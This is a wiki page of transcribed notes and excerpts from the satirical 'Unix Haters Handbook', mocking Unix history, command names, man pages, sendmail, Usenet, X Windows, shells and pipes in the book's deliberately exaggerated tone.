wiki.javier.io

This is an old revision of the document!


Table of Contents

The Unix Haters Handbook, Daniel Weise, Steven Strassmann, 1994

[*][*][*][*][*][*][*][*][ ][ ] => [8]
[*][*][*][*][*][ ][ ][ ][ ][ ] => [5] Basic => Intermediate

Part 1: User friendly?

“The World's First Computer virus”

“Two of the most famous products of Berkeley are LSD and Unix. I don't think that this is a coincidence”

History

The roots of the Unix plague go back to the 1960s, when America Telephone and Telegraph, General Electric, and the Massachusetts Institute of Technology embarked on a project to develop a new kind of computer system called an “information utility” Heavily funded by the Department of Defense's Advanced Research Projects Agency (then known as ARPA), the idea was to develop a single computer system that would be as reliable as an electrical power plant: providing nonstop computational resources to hundreds or thousands of people. The information utility would be equipped with redundant central processor units, memory banks, and input/output processors, so that one could be serviced while others remained running. The system was designed to have the highest level of computer security, so that the actions of one user could not affect another. Its goal was even there in its name: Multics, short for MULTiplexed Information and Computer System.

Multics was designed to store and retrieve large data sets, to be used by many different people at once, and to help them communicate. It likewise protected its users from the external attack as well. It was built like a tank. Using Multics felt like driving one.

The Multics project eventually achieved all of its goals. But in 1969, the project was behind shedule and AT&T got cold feet: it pulled the plug on its participation, leaving three of its researchers- Ken Thompson, Dennis Ritchie, and Joseph Ossanna- with some unexpected time on their hands. After the programmers tried unsuccessfully to get management to purchase a DEC System 10 (a powerful time sharing computer with sophisticated, interactive operating system), Thompson and his friends retired to writing (and playing) a game called Space Travel on a PDP-7 computer that was sitting unused in a corner of their laboratory.

At first, Thompson used Bell Labs' GE645 to cross-compile the Space travel program for the PDP-7. But soon-rationalizing that it would be faster to write an operating system for the PDP-7 that developing Space War on the comfortable environment of the GE645- Thompson had written an assembler, file system, and minimal kernel for the PDP-7. All to play Space Travel. Thus Unix was brewed.

Like scientists working on germ warfare weapons (another ARPA-funded project from the same time period), the early Unix researchers didn't realize the full implications of their actions. But unlike the germ warfare experimenters, Thompson and Ritchie had no protection. Indeed, rather than practice containment, they saw their role as an evangelizers. Thompson and company innocently wrote a few pages they called documentation, and then they actually started sending it out.

At first, the Unix infection was restricted to a few select groups inside Bell Labs. They bought a PDP-11/20 (by then Unix had mutated and spread to a second host) and became the first willing victims of the strain. By 1973 was forced to create the Unix Systems Group for internal support.

Researchers at Columbia University learned of Unix and contacted Ritchie for a copy. Before anybody realized what was happening, Unix had escaped.

Like a classics radio station whose play list spans decades, Unix simultaneously exhibits its mixed and dated heritage. There's Clash-era graphics interfaces; Beatles-era two-letter command names; and system programs (for example, ps) whose terse and obscure output was designed for slow teletypes; Bing Crosby-era command editing (# and @ are still default line editing commands), and Scott Joplin-era core dumps.

Sex, drugs and Unix

While Unix spread like a virus, its adoption by so many can only be described by another metaphor; that of a designer drug.

Like any good drug dealer, AT&T gave awat free samples of Unix to university types during the 1970s. Researchers and students got a better high from Unix that any other OS. It was cheap, it was malleable, it ran on relative inexpensive hardware. And it was superior, for their needs, to anything else they could obtain. Better operating system that would soon be competing with Unix either required hardware that universities couldn't effort, weren't “free”, or weren't yet out of the labs that were busily synthesizing them. AT&T's policy produced, at no cost, scads of freshly minted Unix hackers that were psychologically, if not chemically, dependent on Unix.

Standardizing Unconformity

“The wonderful thing about standards is that there are so many of them to choose from.”

What sort of specification does a version of Unix satisfy? POSIX? X/Open? CORBA? There is so much wiggle room in these standards as to make the idea that a company might have liability for not following them ludicrous to ponder. Indeed, everybody follows these self-designed standards, yet none of the products are compatible.

Unix Myths

Unix has its own collection of myths, as well as a network of dealers pushing them. Perhaps you've seen them before.

  • It's standard.
  • It's fast and efficient.
  • It's the right OS for all purposes.
  • It's small, simple, and elegant.
  • Shell scripts and pipelines are great way to structure complex problems and systems.
  • It's documented on line.
  • It's documented.
  • It's written in a high-level language
  • X and Motif make Unix as user-friendly and simple as the Macintosh.
  • Processes are cheap.
  • It invented:
    • the hierarchical file system
    • electronic mail
    • networking and the Internet protocols
    • remote file system
    • security/passwords/file protection
    • finger
    • uniform treatment of I/O devices
  • It has a productive programming environment.
  • It's a modern operating system.
  • It's what people are asking for.
  • The source code:
    • is available
    • is understandable
    • you buy from your manufacturer actually matches what you are running

Part 2: Welcome, New User!

“Like Russian Roulette with Six Bullets Loaded”

“Ken Thompson has an automobile which he helped design. Unlike most automobiles, it has neither speedometer, nor gas gauge, nor any of the other numerous idiots lights which plague the modern driver. Rather, if the driver makes a mistake, a giant -?- lights up in the center of the dashboard. -The experienced driver.- says Thompson, -will usually know what's wrong.” Anonymous

New users of a computer system (and even seasoned ones) require a certain amount of hospitably from that system. At a minimum, the gracious computer system offers the following amenities to its guests:

  • Logical command names that follow from function
  • Careful handling of dangerous commands
  • Consistency and predictability in how commands behave and in they
  • interpreter their options and arguments
  • Easily found and readable on line documentation
  • Comprehensible and useful feedback when commands fail

Cryptic Command Names

The novice Unix user is always surprised by Unix's choice of command names. No amount of training on DOS or the Mac prepares one for the majestic beauty of cryptic two-letter command names such as cp, rm, and ls.

If Dennis and Ken had a Selectric instead of a Teletype, we'd probably be typing “copy” and “remove” instead of “cp” and “rm” Proof again that technology limits our choices as often as it expands them.

After more than two decades, what is the excuse for continuing this tradition? The implacable force of history, AKA existing code and books. If a vendor replaced rm by, say, remove, then every book describing Unix would no longer apply to its system, and every book describing Unix would no longer apply to its system, and every shell script that calls rm would also no longer apply. Such a vendor might as well stop implementing the POSIX standard while it was at it.

Accidents will happen

Files die and require reincarnation more often under Unix that under any other operating system. Here's why:

  • The Unix file system lacks version numbers.

Automatic file versioning, which gives new versions of files new names or numbered extensions, would preserve previous versions of files. This would prevent new versions of files from overwriting old versions. Overwriting happens all the time in Unix.

  • Unix programmers have a criminally lax attitude toward error reporting and checking.

Many programs don't bother to see if all the bytes in their output file can be written do disk. Some don't even bother to see if their output file has been created. Nevertheless, these programs are sure to delete their input files when they are finished.

  • The Unix shell, not its clients, expand “*”.

Having the shell expand “*” prevents the client program, such as rm, from doing a sanity check to prevent murder and mayhem. Even DOS verifies potentially dangerous commands such as “del *.*”. Under Unix, however, the file deletion program cannot determine whether the user typed:

% rm *
or
% rm file1 file2 file3 ...

This situation could be alleviated somewhat if the original command line was somehos saved and passed on to the invoked client command. Perhaps it could be stuffed into one of those handy environment variables.

  • File deletion is forever.

Unix has no “undelete” command. With other, safer operating systems, deleting a file marks the blocks used by that file as “available for use” and moves the directory entry for that file into a special directory of “deleted files”. If the disk fills up, the space taken by deleted files is reclaimed.

Most operating systems use the two-step, delete-and-purge idea to return the disk blocks used by files to the operating system. This isn't rocket science; even the Macintosh, back in 1984, separated “throwing things into the trash” from “emptying the trash” Tenex had it back in 1974.

Consistently Inconsistent

Predictable commands share option names, take arguments in roughly the same order, and, where possible, produce similar output. Consistency requires a concentrated effort on the part of some central body that promulgates standards. Applications on the Macintosh are consistent because they follow a guide published by Apple. No such body has ever existed for Unix utilities. As a result, some utilities take their options preceded by a dash, some don't. Some read standard input, some don't. Some write standard output, some don't. Some create files world writable, some don't. Some report errors, some don't. Some put a space between an option and a file name, some don't.

The Unix attitude.

The Unix philosophy isn't written advice that comes from Bell Labs or the Unix System Laboratory. It's a free-floating ethic. Various authors list different attributes of it. Life with Unix, by Don Libes and Sandy Ressler (Prentice Hall, 1989) does a particularly good job summing it up:

  • Small is beautiful
  • 10 percent of the work solves 90 percent of the problems
  • When faced with a choice, do whatever is simpler.

According to the empirical evidence of Unix programs and utilities, a more accurate summary of the Unix Philosophy is:

  • A small program is more desirable than a program that is functional or correct
  • A shoddy job is perfectly acceptable
  • When faced with a choice, cop out.

Unix doesn't have a philosophy: it has an attitude. An attitude that says a simple, half-done job is more virtuous that a complex, well-executed one. An attitude that asserts the programmer's time is more important than the user's time, even if there are thousands of users for every programmer. It's an attitude that praises the lowest common denominator.

Part 3: Documentation?

“What documentation?”

“One of the advantages of using UNIX to teach an operating systems course is the sources and documentation will easily fit into a student's briefcase.” -John Lions, University of New South Wales, talking about Version 6, circa 1976“

For years, there were three simple sources for detailed Unix knowledge:

  1. Read the source code
  2. Write your own version
  3. Call up the program's author on the phone (or inquire over the network via e-mail).

Unix was like Homer, handed down as oral wisdom. There simple were no serious Unix users who were not also kernel hackers -or at least had kernel hackers in easy reach. What documentation was actually written -the infamous Unix “man pages” -was really nothing more that a collection of reminders for people who already knew what they were doing.

The Unix documentation system began as a single program called man. man was a tiny utility that took the argument that you provided, found the appropriate matching file, piped the file through nroff with the “man” macros (a set of text formatting macros used for nothing else on the planet), and finally sent to the output through pg or more.

Today's hypertext systems let you jump from article to article in a large database at the click of a mouse button; man pages, by contrast, merely print a section called “SEE ALSO” at the bottom of each page and invite the user to type “man something else” on the command line following the prompt. How about indexing on-line documentation? These days you can buy a CD-ROM edition of the Oxford English Dictionary that indexes every single word in the entire multivolume set; man pages, on the other hand, are still indexed solely by the program's name and one-line description. Today even DOS now has an indexed, hypertext system for on-line documentation. Man pages, meanwhile, are still formatted for the 80-column, 66-line page of a DEC printing terminal.

Shell documentation

The Unix shell always presented a problem for Unix documentation writers: The shells, after all. have built-in commands. Should built-ins be documented on their own man pages or on the man page for the shell? Traditionally, these programs have been documented on the shell page. This approach is logically consistent, since there is no while or if or set command. That these commands look like real commands is a illusion. Unfortunately, this attitude causes problems for new users -the very people for whom documentation should be written.

For example, a user might hear that Unix has a “history” feature which saves them the trouble of having to retype a command that they have previously typed. To find out more about the “history” command, an aspiting novice might try:

% man history
No manual entry for history.

That's because “history” is a built-in shell command. There are many of them. Try to find a complete list. (Go ahead, looking at the man page for sh or csh isn't cheating).

How to get real documentation

Actually, the best form of Unix documentation is frequently running the strings command over a program's object code. Using strings, you can get a complete list of the program's hard-coded file name, environment variables, undocumented options, obscure error messages, and so forth. For example, if you want to find out where the cpp program searches for #include files, you are much better off using strings than man:

next% man cpp
No manual entry for cpp

next% strings /lib/cpp | grep /
/lib/cpp
/lib/
/usr/locl/lib/
/cpp

next%

Hmmm… Excuse us for one second:

% ls /lib
cpp*
cpp-precomp*

next% strings /lib/cpp/precomp | grep /
/*%s*/
//%s
/usr/local/include
/NextDeveloper/Headers
/NextDeveloper/Headers/ansi
/NextDeveloper/Headers/bsd
/LocalDeveloper/Headers
/LocalDeveloper/Headers/ansi
/LocalDeveloper/Headers/bsd
/NextDeveloper/2.0CompatibleHeaders
%s%s
/lib/%s/specs

next%

Silly us. NEXTSTEP's /lib/cpp calls /lib/cpp-precomp. You won't find that documented on the man either:

next% man cpp-precomp
No manual entry for cpp-precomp.

The source code is the documentation

As fate would have it, AT&T's plan backfired. In the absence of written documentation, the only way to get details about how the kernel or user commands worked was by looking at the source code. As result, Unix sources were widely pirated during the operating system's first 20 years. Consultants, programmers, and system administrators didn't copy the source because they wanted to compile it and then stamp out illegal Unix clones: they made copies because they needed the source code for documentation. Copies of Unix source code filtered, but it was justifiable felony: the documentation provided by the Unix vendors was simply not adequate. This is not to say that the source code contained worthwhile secrets. Anyone who had both access to the source code and the inclination to read it soon found themselves in for a rude surprise:

/* You are not expected to understand this */

Although this comment originally appeared in the Unix V6 kernel source code, it could easily have applied to any of the original AT&T code, which was a nightmare of in-line hand-optimizations and micro hacks. Register variables with names like p, pp and ppp being used for multitudes of different purposes in different parts of a single function. Comments like “this function is recursive” as if recursion is difficult-to-understand concept. The fact is, AT&T's institutional attitude toward documentation for users and programmers was indicative of a sloppy attitude toward writing in general, and writing computer programs in particular.

Part 4: Mail

“Don't talk to me, I'm not a typewriter!”

“Not having send mail is like not having VD.” -Ron Heiby, Former moderator, comp.new prod

Send mail: The Vietnam of Berkeley Unix

Send mail was written by Eric Allman at the University of Berkeley in 1983 and was included in the Berkeley 4.2 Unix distribution as BSD's “inter network mail router”. The program was developed as a single “crossbar” for interconnecting disparate mail networks. In its first incarnation, send mail interconnected UUCP, BerkNet and ARPANET (the precursor to Internet) networks. Despite its problems, send mail was better that Unix mail program that it replaced: deliver mail.

In his January 1983 USENIX paper, Allman defined eight goals for send mail:

  1. Send mail had to be compatible with existing mail programs.
  2. Send mail had to be reliable, never losing a mail message.
  3. Existing software had to do the actual message delivery if at all possible.
  4. Send mail had to work in both simple and extremely complex environments.
  5. Send mail's configuration could not be compiled into the program, but had to read at start up.
  6. Send mail had to let various groups maintain their own mailing lists and let individuals specify their own mail forwarding, without having individuals or groups modify the system alias file.
  7. Each user had to be able to specify that a program should be executed to process incoming mail (so that users could run “vacation” programs).
  8. Network traffic had to be minimized by batching addresses to a single host when at all possible.

(An unstated goal in Allman's 1983 paper was that send mail also had to implement the ARPANET's nascent SMTP (Simple Mail Transport Protocol) in order to satisfy the generals who were funding Unix development at Berkeley.)

Send mail was built while the Internet mail handling systems were in flux. As a result, it had to be programmable so that it could handle any possible changes in the standards. Delve into the mysteries of sendmail's unreadable sendmail.cf files an you'll discover ways of rewiring sendmail's insides so that ”@#$@$^%«<@😵 at @$%#^!“ is a valid e-mail address.That was great in 1985. In 1994, the Internet mail standards have been decided upon and such flexibility is no longer needed. Nevertheless, all of sendmail's rope is still there, ready to make a hangman's knot, should anyone have a sudden urge.

Sendmail is one of those clever programs that performs a variety of different functions depending on what name you use to invoke it. Sometimes it's the good ol' sendmail; other times it is the mail queue viewing program or the aliases database-builder. “Sendmail Revisite” admits that bundling so much functionality into a single program was probably a mistake: certainly the SMTP server, mail queue handler, and alias database management system should have been handled by different programs (no doubt carrying through on the Unix “tools” philosophy). Instead we have sendmail, which continues to grow beyond all expectations.

Not following protocols

Every society has rules to prevent chaos and to promote the general welfare. Just as a neighborhood of people sharing a street might be composed of people who came from Europe, Africa, Asia and South America, a neighborhood of computers sharing a network cable often come from disparate places and speak disparate languages. Just as those people who share the street make up a common language for communication, the computers are supposed to follow a common language, called a protocol, for communication.

This strategy generally works until either a jerk moves onto the block or a Unix machine is let onto the network. Neither the jerk nor Unix follows the rules. Both turn over trash cans, play the stereo too loudly, make life miserable for everyone else, and attract wimpy sycophants who bolster their lack of power by associating with the bully.

We wish that we were exaggerating, but we're not. There are published protocols. You can look them up in the computer equivalent of city hall -the RFCs. Then you can use Unix and verify lossage caused by Unix's unwillingness to follow protocol.

For example, an antisocial and illegal behavior of sendmail is to send mail to the wrong address. Let's say that you send a real letter via the U.S. Postal Service that has your return address on it, but that you mailed it from the mailbox down the street, or you gave it to a friend to mail for you. Let's suppose further that the recipient marks “Return to sender” on the letter. An intelligent system would return the letter to the return address; an unintelligent system would return the letter to where it was mailed from, such as to the mailbox down the street or to your friend.

That system mimicking a moldy avocado is, of course, Unix, but the real story is a little more complicated because you can ask your mail program to do tasks you could never ask of your mailman. For example, when responding to an electronical letter, you don't have to mail the return envelope yourself; the computer does it for you. Computers, being the nitpickers with elephantine memories that they are, keep track not only of who a response should be sent to (the return address, called in computer parlance the “Reply-to:” field), but where it was mailed from (kept in the “From:” field). The computers rules clearly state that to respond to an electronic message of Unix flaunt this rule, wrecking havoc on the unsuspecting. Those who religiously believe in Unix thing it does the right thing, misassigning blame for its bad behavior to working software, much as Detroit blames Japan when Detroit's cars can't compete.

For example, consider this sequence of events when Devon McCullough complained to one of the subscribers of the electronic mailing list called PAGANISM that the subscriber had sent a posting to the e-mail address PAGANISM-REQUEST@MC.LCS.MIT.EDU and not to the address PAGANISM@MC.LCS.MIT.EDU:

From:	Devon Sean McCullough <devon@ghoti.lcs.mit.edu>
To:	<PAGANISM Digest Subscriber>
This message was sent to PAGANISM-REQUEST, not PAGANISM. Either you or your 'r' key
screwed up here. Or else the digest is screwed up. Anyway, you could try sending it
again.
  -Devon

The clueless weenie sent back the following message to Devon, complaining that the fault lie not with himself or sendmail, but with the PAGANISM digest itself:

Date:	Sun, 27 Jan 91 11:28:11 PST
From:	<Paganism Digest Subscriber>
To:	Devon Sean McCullough <devon@ghoti.lcs.mit.edu>
>From my perspective, the digest is at fault. Berkeley Unix Mail is what I use, and
>it ignores the "Reply-to:" line, using the "From:" line instead. So the only way
>for me to get the correct address is to either back-space over the dash and type
>the @ etc in, or save it somewhere and go trough some contortions to link the
>edited file to the old echoed address. Why make me go to all that trouble? This is
>the main reason that I rarely post to the PAGANISM digest at MIT.

The interpretation of which is all too easy to understand:

Date:	Mon, 28 Jan 91 18:54:58 EST
From:	Alan Bawden <alan@ai.mit.edu>
To:	UNIX-HATERS
Subject:	Depressing

Notice the typical Unix weenie reasoning here:

“The digestifier produces a header with a proper Reply-to field, in the expectation that your mail reading tool will interpret the header in the documented, standard, RFC822 way. Berkeley Unix Mail, contrary to all standards, and unlike all reasonable mail reading tools, ignores the Reply-To field and incorrectly uses the From field instead.”

Therefore:

“The digestifier is at fault.”

Frankly, I think the entire human race is doomed. We haven't got a snowball's chance of doing anything other that choking ourselves to death on our own waste products during the next hundred years.

It should be noted that this particular feature of Berkeley Mail has been fixed; Mail now properly follows the “Reply-To:” header if it is present in a mail message. On the other hand, the attitude that the Unix implementation is a more accurate standard that the standard itself continues to this day. It's pervasive. The Internet Engineering Task Force (IETF) has embarked on an effort to rewrite the Internet's RFC “standards” so that they comply with the Unix programs that implement them.

Error messages

The Unix mail system knows that it isn't perfect, and it is willing to tell you so. But it doesn't always do so in an intuitive way. Here's a short listing of the error messages that people often witness:

550 chiarell . . . User unknown: Not a typewriter
550 <bogus@ASC.SLB.COM> . . . User unknown: Address already in use
550 zhang@uni-dortmund.de . . . User unknown: Not a bicycle
553 abingdon I refuse to talk to myself
554 "| /usr/new/lib/mh/slocal -user $USER" . . . unknown mailer error 1
554 "| filter -v" . . . unknown mailer error 1
554 Too many recipients for no message body

“Not a typewriter” is sendmail's most legion error message. We figure that the error message “not a bicycle” is probably some system administrator's attempt at humor. The message “Too many recipient for no message body” is sendmail's attempt at Big Brotherhood. It thinks it knows better that the proletariat masses, and it won't send a message with just a subject line.

The conclusion is obvious: you are lucky to get mail at all or to have messages you send get delivered. Unix zealots who think that mail systems are complex and hard to get right are mistaken. Mail used to work, and work highly reliably. Nothing was wrong with mail systems until Unix came along and broke things in the name of “progress.”

Part 5: Snoozenet

“I post, Therefore I Am”

“Usenet is a cesspool, a dung heap” -Patrick A. Townson

We're told that the information superhighway is just around the corner. Nevertheless, we already have to deal with the slow-moving garbage trucks clogging up the highway's arteries. These trash-laden vehicles are NNTP packets and compressed UUCP batches, shipping around untold gigabytes a day of trash. This trash is known, collectively, as Usenet.

The great renaming

As more sites joined the net and more groups were created, the net/mod sheme collapsed. A receiving site that wanted only the technical groups forced the sending to explicitly list all of them, which, in turn, required very long lines in the configuration files. Not surprisingly (especially not surprisingly if you've been reading this book straight through instead of leafing through it in the bookstore), they often exceeded the built-in limits of the Unix tools that manipulated them.

In the early 1980s Rick Adams addressed the situation. He studied the list of current groups and, like a modern day Linnaeus, categorized them into the “big seven” that are still used today:

comp	Discussion of computers (hardware, software, etc.)
news	Discussion of Usenet itself
sci	Scientific discussion (chemistry, etc.)
rec	Recreational discussion (TV, sports, etc.)
talk	Political, religious, and issue-oriented discussion
soc	Social issues, such as culture
misc	Everything else

This information highway needs information

Newsgroups with large amounts of noise rarely keep those subscribers who can constructively add to the value of the newsgroup. The result is a polarization of newsgroups: those with low traffic and high content, and those with high traffic and low contact. The polarization is sometimes a creeping force, bringing all discussion down to the lowest common denominator. As the quality newsgroups get noticed, more people join -first as readers, then as posters.

  • rn, trn: You get what you pay for
  • Like almost all of the Usenet software, the programs that people use to read (and post) news are available as freely redistributable source code. This policy is largely a matter of self-preservation on the part of the authors:
  • It's much easier to let other people fix the bugs and port the code; you can even turn the reason around on its head and explain why this is a virtue of giving out the source.
  • Unix isn't standard; the poor author doesn't stand a chance in hell of being able to write code that will “just work” on all modern Unixes.
  • Even if you got a single set of sources that worked everywhere, different Unix C compilers and libraries would ensure that compiled files won't work anywhere but the machine where they were built.

Part 6: Terminal insanity

“Curses! Foiled again!”

Original Sin

Unfortunately for us. Unix was designed in the days of teletypes. Teletypes support operations like printing a character, backspacing, and moving the paper up a line at a time. Since that time, two different input/output technologies have been developed: the character based video display terminal (VDT), which output characters much faster than hard copy terminals and, at the very least, place the cursor at arbitrary positions on the screen; and the bit-mapped screen, where each separate pixel could be turned on or off (and in the case of color, each pixel could have its own color from a color map).

Part 7: The X-Windows disaster

“How to make a 50-MIPS workstation run like a 4.77 MHz IBM PC”

“If the designer of X Windows built cars, there would be no fewer than five steering wheels hidden about the cockpit, none of which followed the same principles - but you'd be able to shift gears with your car stereo. Useful feature, that.” -Marcus J. Ranum, Digital Equipment Corporation.

X windows is the Iran-Contra of graphical user interfaces: a tragedy of political compromises, entangled alliances, marketing hype, and just plain greed. X windows is to memory as Ronald Reagan was to money. Years of “Voodoo Ergonomics” have resulted in an unprecedented memory deficit of gargantuan proportions. Divisive dependencies, distributed deadlocks, and partisan protocols have tightened gridlocks, aggravated race conditions, and promulgated double standards.

X has had its share of $5,000 toilet seats -like Sun's Open Look clock tool, which gobbles up 1.4 megabytes of real memory! If you sacrificed all the RAM from 22 Commodore 64s to clock tool, it still wouldn't have enough to tell you the time. Even the vanilla X11R4 “xclock” utility consumes 656 to run. And X's memory usage is increasing.

X: The first fully modular software disaster

X Windows started out as one man's project in an office on the fifth floor of MIT's laboratory for computer science. A wizardly hacker, who was familiar with W, a window system written at Stanford University as part of the V project, decided to write a distributed graphical display server. The idea was to allow a program, called a client, to run on one computer and allow it to display on another computer that was running a special program called a window server. The two computer might be VAXes or Suns, or one of each, as long as the computers were networked together and each implemented the X protocol.

Note: We have tried to avoid paragraph-length footnotes in this book, but X has defeated us by switching the meaning of client and server. In all other client/server relationships, the server is the remote machine that runs the application (i.e., the server provides services, such as database service or computation service). For some perverse reason that's better left to imagination, X insists on calling the program running on the remote machine “the client”. This program displays its windows on the “window server”. We're going to follow X terminology when discussing graphical client/servers. So when you see “client” think “the remote machine where the application is running” and when you see “server” think “the local machine that displays output and accepts user input.”

The nongraphical GUI

X was designed to run three programs: xterm, xload, and xclock. (The idea of a window manager was added as an afterthought, and it shows.) For the first few years of its development at MIT, these were, in fact, the only programs that ran under the window system. Notice that none of these programs have any semblance of a graphical user interface (except xclock), only one of these programs implements anything in the way of cut-and-paste (and then, only a single data type is supported), and none of them requires a particularly sophisticated approach to color management. Is it any wonder, then, that these all areas in which moder X falls down? Ten years later, most computers running X run just four programs: xterm, xload, xclock, and a window manager. And most xterm windows run Emacs! X has to be the most expensive way ever of popping up an Emacs window. It sure would have been much cheaper and easier to put terminal handling in the kernel where it belongs, rather that forcing people to purchase expensive bit mapped terminals to run character-based applications. On the other hand, then users wouldn't get all of those ugly fonts. It's a trade-off.

The Motif self-abuse kit

X gave Unix vendors something they had professed to want for years: a standard that allowed programs built for different computers to interpreted. But it didn't give them enough. X gave programmers a way to display windows and pixels, but it didn't speak to buttons, menus, scroll bars, or any of the other necessary elements of a graphical user interface. Programmers invented their own. Soon the Unix community had six or so different interface standards. A bunch of people who hadn't written 10 lines of code in as many years set up shop in a brick building in Cambridge, Massachusetts, that was the former house of a failed computer company and came up with a “solution” the Open Software Foundation's Motif.

What Motif does is make Unix slow. Real slow. A stated design goal of Motif was to give the X Window System the window management capabilities of HP's circa-1988 window manager and the visual elegance of Microsoft Windows. We kid you not.

Recipe for disaster: start with the Microsoft Windows metaphor, which was designed and hand coded in assembler. Build something on top of three or four layers of X to look like Windows. Call it “Motif”. Now put two 486 boxes side by side, one running Windows and one running Unix/Motif. Watch one crawl. Watch it wither. Watch it drop faster than the putsh in Russia. Motif can't compete with the Macintosh OS or with DOS/Windows as a delivery platform.

Ice cube: The lethal weapon

One of the fundamental design goals of X was to separate the window manager from the window server. “Mechanism, not policy” was the mantra. That is, the X servers provided a mechanism for drawing on the screen and managing windows, but did not implement a particular policy for human-computer interaction. While this might have seemed like a good idea at the time (especially if you are in a research community, experimenting with different approaches for solving the human-computer interaction problem), it created a veritable user interface Tower of Babel.

If you sit down at a friend's Macintosh, with its single mouse button, you can use it with no problems. If you sit down at a friend's Windows box, with no problems. But just try making sense of a friend's X terminal: three buttons, each one programmed a different way to perform a different function on each different day of the week -and that's before you consider combinations like control-left-button, shift-right-button, control-shift-meta-middle-button, and so on. Things are not much better from the programmer's point of view.

As a result, one of the most amazing pieces of literature to come out of the X Consortium is the “Inter Client Communication Conventions Manual” more fondly known as the “ICCCM”, “Ice cubed” or “I39L” (short for “I, 39 letters, L”). It describes protocols that X clients must use to communicate with each other via the X server, including diverse topics like a window management, selections, keyboard and color map focus, and session management. In short, it tries to cover everything the X designers forgot and tries to fix everything they got wrong. But it was too late -by the time ICCCM was published, people were already writing window managers and tool kits, so each new version of the ICCCM was forced to bend over backwards to be backward compatible with the mistakes of the past.

The ICCCM is unbelievably dense, it must be followed to the last letter, and it still doesn't work. ICCCM compliance is one of the most complex ordeals of implementing X tool kits, window managers, and even simple applications. It's so difficult, that many of the benefits just aren't worth the hassle of compliance. And when one program doesn't comply, it screws up other programs. This is the reason that cut-and-paste never works properly with X (unless you are cutting and pasting straight ASCII text), drag-and-drop locks up the system, color maps flash wildly and are never installed at the right time, keyboard focus lags behind the cursor, keys go to the wrong window, and deleting a pop up window can quit the whole application, you have to crossbar test it with every other application, and with all possible window managers, and then plead with the vendors to fix their problems in the next release.

In summary, ICCCM is a technological disaster: a toxic waste dump of broken protocols, backward compatibility nightmares, complex non solutions to obsolete non problems, a twisted mass of scabs and scar tissue intended to cover up the moral and intellectual depravity of the industry's standard naked emperor.

X Myths

  • Myth: X demonstrates the power of client/server computing

At the mere mention of network window systems, certain propeller heads who confuse technology with economics will start foaming at the mouth about their client/server models and how in the future palm stops will just run the X server and let the other half of the program run on some Cray down the street. They've become unwitting pawns in the hardware manufacturer's conspiracy to sell newer systems each year. After all, what better way is there to force users to upgrade their hardware than to give them X, where a single application can bog down the client, the server, and the network between them, simultaneously! Myth: X makes Unix “easy to use”

Graphical interfaces can only paper over misdesigns and kludges in the underlying operating system; they can't eliminate them. The “drag-and-drop” metaphor tries to cover up the Unix file system, but so little of Unix is designed for the desktop metaphor that it's just one kludge on top of another, with little holes and sharp edges popping for such ineffective and unreliable performance.

  • Myth: X is “customizable”
  • Myth: X is “portable”
  • Myth: X is device independent

X is extremely device dependent because all X graphics are specified in pixel coordinates. Graphics drawn on different resolution screens come out at different sizes, so you have to scale all the coordinates yourself if you want to draw at a certain size. Not all screens even have square pixels: unless you don't mind rectangular squares and oval circles, you also have to adjust all coordinates according to the pixel aspect ratio.

Part 8: csh, pipes, and find

“Power tools for power fools”

“I have a natural revulsion to any operating system that shows so little planning as to have to named all of its commands after digestive noises (awk, grep, fsck, nroff).” -Unknown.

The Unix “power tool” metaphor is a canard. It's nothing more than a slogan behind which Unix hides its arcane patchwork of commands and adhoc utilities. A real power tool amplifies the power of its user with little additional effort or instruction. Anyone capable of using screwdriver or drill can use a power screwdriver or power drill. The user needs no understanding of electricity, motors, torquing, magnetism, heat dissipation, or maintenance. She just needs to plug it in, wear safety glasses. It's rare to find a power tool that is fatally flawed in the hardware store: most badly designed power tools either don't make it to market or result in costly lawsuits, removing them from the market and punishing their makers.

Unix power tools don't fit this mold. Unlike the modest goals of its designers to have tools that were simple and single-purposed, today's Unix tools are over-featured, over-designed, and over-engineered. For example, ls, a program that once only listed files, now has more that 18 different options that control everything from sort order to the number of columns in which the printout appears -all functions that are better handled with other tools (and once were). The find command writes cpio-formatted output files in addition to finding files (something easily done by connecting the two command with an infamous Unix pipe). Today, the Unix equivalent of a power drill would have 20 dials and switches, come with a nonstandard plug, require the user to hand-wind the motor coil, and not accept 3/8” or 7/8“ drill bits (though this would be documented in the BUGS section of its instruction manual).

The shell game

The inventors of Unix had a great idea: make the command processor be just another user-level program. If users didn't like the default command processor, they could write their own. More importantly, shells could evolve, presumably so that they could become more powerful, flexible, and easy to use.

It was a great idea, but it backfired. The slow accretion of features caused a jumble. Because they weren't designed, but evolved, the curse of all programming languages, an installed base of programs, hit them extra hard. As soon as a feature was added to a shell, someone wrote a shell script that depended on that feature, thereby ensuring its survival. Bad ideas and features don't die out.

The result is today's plethora of incomplete, incompatible shells (description of each shell are from their respective man pages):

  • sh A command programming languages that executes command read from a terminal or a file
  • jsh Identical [to sh], but with chs-style job control enabled
  • csh A shell with C-like syntax
  • tcsh Csh with emacs-style editing
  • ksh KornShell, another command and programming language
  • zsh The Z shell
  • bash The GNU bourne-again shell

Pipes

Unix lovers believe in the purity, virtue, and beauty of pipes. They extol pipes as the mechanism that, more that any other feature, makes Unix Unix. “Pipes”, Unix lovers intone over and over again, “allow complex programs to be built out of simpler programs. Pipes allow programs to be used in unplanned and unanticipated ways. Pipes allow simple implementations.” Unfortunately, chanting mantras doesn't do Unix any more good that it does the Hari Krishnas.

Pipes do have some virtue. The construction of complex systems requires modularity and abstraction. This truth is a catechism of computer science. The better tools one has for composing larger systems from smaller systems, the more likely a successful and maintainable outcome. Pipes are a structuring tool, and, as such, have value.

Indeed, while pipes are useful at times, their system of communication between programs -text traveling through standard input and standard output- limits their usefulness. First, the information flow is only one way. Processes can't use shell pipelines to communicate bidirectionally. Second, pipes don't allow any form of abstraction. The receiving and sending processes must use a stream of bytes. Any object more complex than a byte cannot be sent until the object is first transmuted into a string of bytes that the receiving end knows how to reassemble. This means that you can't send an object and the code for the class definition necessary to implement the object. You can't send pointers into another process's address space. You can't send file handles or tcp connections or permissions to access particular files or resources.

At the risk of sounding like a hopeless dream keeper of the intergalactic space, we submit that the correct model is procedure call (either local or remote) in a language that allows first-class structures (which C gained during its adolescence) and functional composition.

Pipes are good for simple hacks, like passing around simple text streams, but not for building robust software. For example, an early paper on pipes showed how a spelling checker could be implemented by piping together several simple programs. It was a tour de force of simplicity, but a horrible way to check the spelling (let alone correct it) of a document.

Pipes in shell scripts are optimized for micro-hacking.They give programmers the ability to kludge up simple solutions that are very fragile. That's because pipes create dependencies between the two programs: you can't change the output format of one without changing the input routines of the other.

